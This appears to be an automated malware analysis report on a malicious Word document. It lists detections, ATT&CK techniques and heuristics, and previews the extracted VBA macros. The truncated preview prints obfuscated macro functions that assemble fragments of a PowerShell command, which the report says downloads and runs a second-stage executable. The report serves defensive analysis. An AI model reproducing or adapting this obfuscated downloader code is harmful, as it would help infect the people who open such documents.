MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Word document containing VBA macros. The AutoOpen macro is present and utilizes the Shell() function, indicating an attempt to execute external code. The script constructs strings that appear to form a command to download and execute a second-stage payload, likely a Windows executable, from a remote source.
Heuristics 8
-
ClamAV: Doc.Malware.Valyria-6923113-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6923113-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.iec.ch In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45129 bytes |
SHA-256: befec462ddc628a7b5b27d6359352a0ca27d4db5e933e27fa9a085408ec98443 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function fkfnbrkqw()
Dim tnqwli
tnqwli = 9444
ymbokj39 = Array("oiyi", ";$GsDYi='7.exe';$s")
fkfnbrkqw = ymbokj39
End Function
Function uwke9()
uquyk = Array("FocI86", "$fqjxljle+")
uwke9 = uquyk
End Function
Function LIEFTHT()
znjyukmuu = Array("ZE+$B", "EOKQJQYVCN")
LIEFTHT = znjyukmuu
End Function
Function yieuqo72()
Const yemxdb = "-6779"
slkkpl = Array("LIOSSIFF10", "ie")
yieuqo72 = slkkpl
End Function
Function ppuxys3()
iiutsi = Array("hil';$zaul", "lqokz63")
ppuxys3 = iiutsi
End Function
Function YYECNOZD()
asoyzu = Array("GiQU", "pe ';$usgtjx")
YYECNOZD = asoyzu
End Function
Function qualnag()
PWMQINOAO = Array("vvtpkeukm08", "';$ltawx='")
qualnag = PWMQINOAO
Dim aarc As Integer
aarc = -25120
End Function
Function boyy()
XXNCI = Array("i+$UyiYekX);", "QaPu")
boyy = XXNCI
Const pppgamubr = -53372
End Function
Function aarhofbf()
uzenelbri = Array("lpmjldwoa", "+$PJXE")
aarhofbf = uzenelbri
End Function
Function AOEI1()
UBETFYIAI = Array("SUpl01+$vj", "qpojwhgue")
AOEI1 = UBETFYIAI
Const fajbk = "38926"
End Function
Function AUUf()
Const cfedcoltln65 = 38682
ksctwrrixfdj0 = Array("OOEGNEOVW", "fbnzy+$ugjpca+$")
AUUf = ksctwrrixfdj0
End Function
Function oclyav()
LdmzcGuodtmu = Array(";$Lrmwuy28", "czokbihevg")
oclyav = LdmzcGuodtmu
End Function
Function ecwsxflr()
psiitxrfm7 = Array("yoezu+$DwA", "gli")
ecwsxflr = psiitxrfm7
End Function
Function yaicleo43()
BasIE = Array("ks", "iqexe+$nnidz+$w")
Const idceoi = -56365
yaicleo43 = BasIE
End Function
Function ZyiAE()
Const hrzoihpjh3 = 24335
Const ovsic = 35503
rcldllxtu = Array("fqzltwu", "yz='//shan';")
ZyiAE = rcldllxtu
End Function
Function xraaqhy()
zflnu = Array("u='{ $'", "vhiaylidx79")
xraaqhy = zflnu
End Function
Function WxwhHqXzj0()
YRvxhG = Array("'Pro'", "iwzdtlusrc")
WxwhHqXzj0 = YRvxhG
End Function
Function etzgfpoo50()
BbPArluiae = Array("ZqcsYwMw3", "sajt")
etzgfpoo50 = BbPArluiae
End Function
Function abuuwcmb()
AuxoeDttJa = Array("45+$bkyzsl", "isladbs")
abuuwcmb = AuxoeDttJa
Const yzwosf = -31115
aeavfzse = 23348
End Function
Function yiiu94()
kdyu = Array("AurQaO", "='f($drl';")
yiiu94 = kdyu
End Function
Function wkbsayo93()
bcydhfoa57 = Array("shel", "YuaYuU")
wkbsayo93 = bcydhfoa57
End Function
Function FXwcpwbU()
gfakemk = Array("ee", "'emp';$hxuac")
FXwcpwbU = gfakemk
Dim guuonmu As Integer
guuonmu = 9730
End Function
Function uilgkwa()
ciubl = Array("AistoAsbIe14", "5='curse ';$")
uilgkwa = ciubl
End Function
Function szrzsrjwkv()
valdaiefpr = Array("WngPhnHzke", "B+$gsaby+$aooy66+")
szrzsrjwkv = valdaiefpr
End Function
Function iaeiqz()
eaoozmiyx = Array("itz", "UD+$zefbp0")
Const ilqzbh10 = "3091"
iaeiqz = eaoozmiyx
End Function
Function fluywygr()
oaycaae58 = Array("ayu", "ormat';$xjeoqhn='")
Dim VWIEXCKWV As Integer
VWIEXCKWV = 6907
fluywygr = oaycaae58
End Function
Function zdtsthcl()
iekeaui = Array("bgq='ent'; Invo", "xhcvy14")
zdtsthcl = iekeaui
End Function
Function blhvwuu()
ebagvqiybz30 = Array("pjrooevmhb", "' %s; ';$LqvaTi=")
blhvwuu = ebagvqiybz30
Dim YAOIPP
YAOIPP = -31120
Const tsuoutbc00 = -51740
End Function
Function ydycu()
Dim fgkgia
fgkgia = 17239
fgdhmwdco = -13304
ovgaa = Array("';$lpbrqat", "dlgd")
ydycu = ovgaa
iykgspn = -25269
End Function
Function WeiDP()
NYJKFG = Array("WjmamYbzi", "eg0='\eouo';$vjyoezu")
WeiDP = NYJKFG
End Function
Function AEhKzcm()
sowcvbe = Array(";$zefbp06='cess;';$", "pjmcxesfi")
AEhKzcm = sowcvbe
End Function
Function tpcqelh63()
PRUGOZU6 = Array("ch", "YQB='Net.W';$yajat='")
tpcqelh63 = PRUGOZU6
Const szanviu80 = "-26062"
Const jwyqri = 9580
End Function
Function efdsche()
nubyoljlt = Array("swo='nfig'", "eof
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.